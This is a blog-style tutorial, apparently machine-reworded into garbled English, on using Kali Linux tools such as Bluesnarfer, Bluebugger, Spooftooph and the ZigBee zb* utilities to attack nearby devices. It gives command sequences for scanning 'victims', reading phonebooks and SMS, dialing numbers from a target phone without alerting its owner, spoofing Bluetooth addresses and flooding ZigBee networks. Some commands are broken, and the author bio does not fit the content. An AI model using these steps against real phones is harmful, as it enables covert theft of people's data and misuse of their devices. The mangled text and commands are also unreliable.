Best Tools To Hack Bluetooth and Any Wireless Connection in Kali Linux

How To Hack Smartphone Bluetooth by the use of kali Linux

Record Of equipment to hack bluetooth:


Blooover is acting the Bluebug assault. While you intend to put in the applying, you must be the usage of a cellphone that has the Java Bluetooth API carried out.


  • Studying phonebooks
  • Writing phonebook entries
  • Studying/deciphering SMS saved at the tool
  • Environment name ahead
  • Beginning cellphone name


Bluelog is a Linux Bluetooth scanner with not obligatory daemon mode and internet front-end, designed for website surveys and site visitors tracking. It’s supposed to be run for lengthy sessions of time in a static location to decide what number of discoverable Bluetooth instruments there are within the house.

Use the underneath command to peer the within sight bluetooth tool main points in log record named btdevices.log

bluelog -i hci0 -o /root/Desktop/btdevices.log –v

This command supply More information together with knowledge of producer, broadcast names and tool elegance.

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v

BlueMaho:Bluetooth Hacker App

BlueMaho is GUI-shell (interface) for suite of equipment for checking out safety of bluetooth instruments. It’s freeware, opensource, written on python, makes use of wxPyhon. It may be used for checking out BT-devices for recognized vulnerabilities and main factor to do – checking out to seek out unknown vulns. Additionally it might shape great statistics.

BlueMaho, an built-in Bluetooth scanning/hacking software. Right here we can merely use it for scanning. You’ll get started BlueMaho’s sublime GUI through typing:

While you do, it opens a GUI. Right here, I’ve clicked at the “get SDP information” and hit the play button to the left. BlueMaho starts scanning for discoverable instruments, and prefer the opposite equipment, it reveals two Bluetooth instruments.

Within the backside window, BlueMaho presentations extra information from the scanned instruments. I’ve copied that information and positioned it right into a textual content record to make it more straightforward so that you can learn.

Notice that it presentations the identify of the primary tool after which describes the tool sort as “Audio/Video, Headset profile.” Then establish 2nd tool and we’re informed its tool sort is “Telephone, Sensible cellphone.”

Now, that we understand how to assemble knowledge at the Bluetooth instruments in our vary,


BlueRanger is an easy Bash script which makes use of Hyperlink High quality to find Bluetooth tool radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since maximum instruments permit pings with none authentication or authorization. The upper the hyperlink high quality, the nearer the tool (in concept).

Use a Bluetooth Magnificence 1 adapter for lengthy vary location detection. Transfer to a Magnificence 3 adapter for extra actual quick vary finding. The recision and accuracy rely at the construct high quality of the Bluetooth adapter, interference, and reaction from the far flung tool. Fluctuations would possibly happen even if neither tool is in movement.

Use the Bluetooth interface (hci1) to scan for the desired far flung cope with (20:C9:D0:43:4B:D8):

[email protected]:~# hci1 20:C9:D0:43:4B:D8Bluesnarfer

Bluesnarfer downloads the phone-book of any cellular tool liable to Bluesnarfing. If an cell phone is inclined, it’s conceivable to connect with the telephone with out alerting the landlord, and acquire get admission to to limited parts of the saved information

Scan the far flung tool cope with (-b 20:C9:D0:43:4B:D8) and get the tool information (-i):

[email protected]:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Cell Bluetooth The usage of Bluesnarfer

Take a look at The Configuration

hciconfig hci0

Scan for sufferers

hcitool scan hci0

Ping the vitcim tool to peer if tool is wakeful

l2ping < Victim MAC Addr>

Browse the sufferer for rfcomm channels to connect with

sdptool browse –tree –l2cap < mac addr >

Then you’ll be able to use bluesnarfer for instance to learn the sufferers phonebook, dial a bunch or learn Sms or different issues

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To peer to be had opions to do 

bluebugger -h

Dial quantity

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Btscanner :Hack Bluetooth In Kali Linux

Btscanner software can seize knowledge from a Bluetooth tool with out pairing. You’ll obtain Btscanner the usage of this Hyperlink ^( The setup may be very small is dimension (simplest 1.05 MB) and simple to put in. Btscanner seek instruments and display them at the display screen and if you wish to see extra information simply hit input and it’ll display instruments mac cope with.

1 Get started your bluetooth with that command

Syntax:-service bluetooth get started

2 Now open the btscanner with this command 

Syntax:- btscanner

Now you’re right here

3 Now see the directions which might be given underneath in my case press i . and your scan is began

4.Now you to find the bluetooth tool listing

5.Now make a selection with the arrow keys and press input and get complete information in regards to the bluetooth.


RedFang is a small proof-of-concept utility to seek out non discoverable Bluetooth instruments. That is completed through brute forcing the ultimate six (6) bytes of the Bluetooth cope with of the tool and doing a read_remote_name().

Scan the given vary (-r 00803789EE76-00803789EEff) and uncover Bluetooth instruments (-s):

[email protected]:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning Bluetooth tool knowledge. Spooftooph is designed to automate spoofing or cloning Bluetooth tool Identify, Magnificence, and Deal with. Cloning this data successfully lets in Bluetooth tool to cover in undeniable website. Bluetooth scanning instrument will simplest listing one of the instruments if greater than one tool in vary stocks the similar tool knowledge when the instruments are in Discoverable Mode (particularly the similar Deal with).

Neatly in most cases maximum folks by no means intend to audit the Bluetooth stack in any group. However this software might be fascinating to make use of in an atmosphere the place Bluetooth instruments were paired with essential .

Use the Bluetooth interface (-i hci1) to spoof itself because the given cope with (-a 00803789EE76):

[email protected]:~# spooftooph -i hci1 -a 00803789EE76

Different Wi-fi Gear


Transmit a flood of affiliate requests to a goal community.

zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float] 

zbassocflood -p 0xBAAD -c 11 -s 0.1


Decode plaintext key ZigBee supply from a seize record. Will procedure libpcap or Daintree SNA seize recordsdata.

zbdsniff: Decode plaintext key ZigBee supply from a seize record. Will procedure libpcap or Daintree SNA seize recordsdata

zbdsniff [capturefiles …]


A tcpdump-like software for ZigBee/IEEE 802.15.4 networks

zbdump – a tcpdump-like software for ZigBee/IEEE 802.15.4 networks Suitable with Wireshark 1.1.2 and later

zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind supplies a GTK-based GUI to the consumer which presentations the result of a zbstumbler-like capability. zbfind sends beacon requests because it cycles via channels and listens for a reaction, including the reaction to a desk in addition to showing sign energy on a gauge widget.


Seek a binary record to spot the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet

zbgoodfind – seek a binary record to spot the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:

zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d genenerate binary file (test mode)]


Replay ZigBee/802.15.4 community site visitors from libpcap or Daintree recordsdata

zbreplay: replay ZigBee/802.15.4 community site visitors from libpcap or Daintree recordsdata:

zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the printed cope with whilst channel hopping to spot ZC/ZR instruments.

Author: Marshmallow

Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).

Leave a Reply